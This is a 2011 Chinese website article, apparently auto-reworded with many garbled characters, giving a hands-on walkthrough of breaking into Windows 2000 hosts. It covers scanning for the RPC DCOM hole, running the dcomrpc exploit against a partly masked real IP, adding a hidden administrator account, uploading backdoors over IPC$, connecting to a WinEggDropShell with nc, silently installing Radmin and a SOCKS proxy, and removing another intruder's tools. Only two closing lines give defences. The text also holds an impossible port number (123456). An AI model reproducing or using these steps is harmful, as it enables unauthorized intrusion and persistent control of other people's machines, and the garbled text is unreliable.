立即登录 注册新帐号

http://www.chutianz.com - 楚天站长站

会员投稿 匿名投稿 投稿指南 RSS订阅 楚天站长站推荐:
搜索: 您的位置主页 > 服务器 > 安全防护 > 阅读资讯:黑客进侵实战录:一步一个脚印学好进侵

黑客进侵实战录:一步一个脚印学好进侵

2011-11-27 13:52:18 来源:www.chutianz.com 【 】 点击:我要投稿 发表评论

  需要的工具:

  很好的: radmin.exe

  扫描工具: retinarpcdcom.exe

  溢出攻击工具:RpcDcom(通用溢出工具)

  脚本开启telnet工具:telnet.vbe opentelnet.exe resumetelnet.exe

  代理:sksockserver.exe

  后门程序:WinEggDropShellPro3thVersion

  好了,该做的都做的差未几了。现在开端把~~

  首先应用retinarpcdcom.exe扫描一个网段。查找有rpc漏洞的机子,这个漏洞需要135端口开放,(想必

  随便扫一下就会发明有很多主机开放的135端口)。。。。。。

  (人走运座着都能检到钱) 211.217.50.xx 第一个主机就被扫出来又此漏洞。开端工作

  看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以应用流光扫描一下, 好了..看样子没有其他的缺点,主机开了3389端口,我们可以上往看一下是xp版本还是win2k哈哈,是win2k server版本

  展开命令行:

  [查看dcomrpc的用法 用法 dcomrpc -d [options]  ]

  F:\hack>cd rpc\dcomrpc

  RPC DCOM Expl01t coded by .:[oc192.us]:. Security

  Complied and Modified by Expl01t www.longker.com

  Usage:

  dcomrpc -d [options]

  Options:

     -d:    Hostname to attack [Required]

     -t:    Type [Default: 0]

     -r:    Return address [Default: Selected from target]

     -p:    Attack port [Default: 135]

     -l:    Bindshell port [Default: 666]

  Types:

     0 [0x0018759f]: [Win2k-Universal]

     1 [0x0100139d]: [WinXP-Universal]

  开端进行溢出:

  F:\hack>cd rpc\dcomrpc -d 211.217.50.xx 0

  RPC DCOM remote expl01t - .:[oc192.us]:. Security

  Complied and recorrected by Expl01t www.longker.com

  [ ] Resolving host..

  [ ] Done.

  [ ] Expl01ting....Just wait......

  等到呈现,阐明溢出成功

  c:\winnt\system32>

  接着我们建立用户

  c:\winnt\system32>net user blueye$ 1111 /add

  命令成功完成。

  把用户添加成超级治理员

  c:\winnt\system32>net localgroup administrators blueye$ /add

  命令成功完成。

  看看共享开了没有,没有的话把共享开开

  c:\winnt\system32>net share

  清单是空的。

  c:\winnt\system32>net share ipc$

  命令成功完成。

  c:\winnt\system32>net share admin$

  命令成功完成。

  到这里我们进侵告一段落

  [ 建 立 IPC$ 连 接 ,也可以应用tftp上传 ,先和对方建立连接]

  F:\hack>net use \\211.217.50.xx\ipc$ '1111' /user:blueye$

  [ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里]

  F:\hack>copy d:\inject.exe \\211.217.50.xx\admin$\system32

  F:\hack>copy d:\tback.dll \\211.217.50.xx\admin$\system32

  然后运行后门程序,我们可以应用at命令。但是有的机器把at明令禁止了,建议直接开起telnet

  应用opentelnet.exe  封闭开启的telnet应用resumetelnet \\ip user password

  假如忘记开共享可以应用脚本开启telnet来开共享,用法:

  cscript telnet.vbe ip user password null port  (null是验证方法)

  F:\hack>opentenet \\211.217.50.xx blueye$ 1111 1 4567

  F:\hack>telnet 211.217.50.xx 4567

  省略...

  连接并运行后门程序,运行后门程序命令 根目录:inject.exe -run

  (后门应用方法和安装都在zip文件里面包含了)

  后门端口123456

  F:\hack>nc 211.217.50.xx 123456

          Welcome To WinEggDropShell Matrix Version

  [Melody]#

  下面安装radmin

  配置好的radmin客户端有4个文件。配置radmin客户端可参考相干文章

  radmin.reg

  raddrv.dll

  admdll.dll

  r_server.exe

  把这个4个文件copy c:\winnt\system32

  在目录下面履行命令

  c:\winnt\system32>r_server /s radmin.reg  -----导进注册表

  c:\winnt\system32>r_server /install /silence -----安装radmin.并且不显示托盘

  c:\winnt\system32>net start r_server ----- 启动服务

  可以开启3389的话你自己看着办把,哈哈

  安装sock代理

  把sksockserver.exe copy c:\winnt\system32

  c:\winnt\system32>sksockserver /install         -----安装服务

  c:\winnt\system32>sksockserver -config port 1234     ----端口定在1234 自己可以改

  c:\winnt\system32>sksockserver -config starttype 2    ----开机主动启动

  c:\winnt\system32>net start skserver            ----启动服务

  最后删除共享

  net share ipc$ /del

  net share admin$ /del

  在安装radmin的时候你发明有人已经安装了。。怎么办?走人?--------NO

  看把持  (我输进的内容)

  后门连接

  F:\hack>nc 211.217.50.xx 123456

          Welcome To WinEggDropShell Matrix Version

  [Melody]#(pslist)

  [Melody]#(pskill r_server)

  [Melody]#(shell)

  c:\winnt\system32>(del r_server.exe)

  c:\winnt\system32>(del admdll.dll)

  c:\winnt\system32>(del raddrv.dll)

  copy你自己的上往,然后安装

  省事的措施直接导进注册表,然后重新输进安装命令运行,就可以了,只是在本来默认端口上面架上了密码
  
等等。。。。为什么我输进导进注册表命令不管用呢?呈现什么regedit不是可运行的程序之类的 。

  完了,努力白费了。。。。。。。 -----------------------------NO

  呈现这样的情况最简略的解决措施telnet上往导进试试看,什么?不是把,有没有搞错阿。。。

  呵呵,尽管放心,往试试看就知道;还可以先运行radmin 然后在radmin的dos下导进,也是可以的

  嗬嗬,往试试看吧

  防御措施:

  安装rpc补丁

  应用防火墙过滤135,445,139等端口


感谢 的投稿 本文仅代表作者观点,与楚天站长站立场无关。

分享到:

数据统计中!!

tags:, , ,需要,的,工具,:, , ,很,好

 责任编辑:毛新红
  • 上一篇:无商不*** 揭开软件厂商的十大丑陋嘴脸!
  • 下一篇:学会如何奇妙从过程中判定出病毒和木马
  • 评论总数: 条 [ 查看全部 ] 网友评论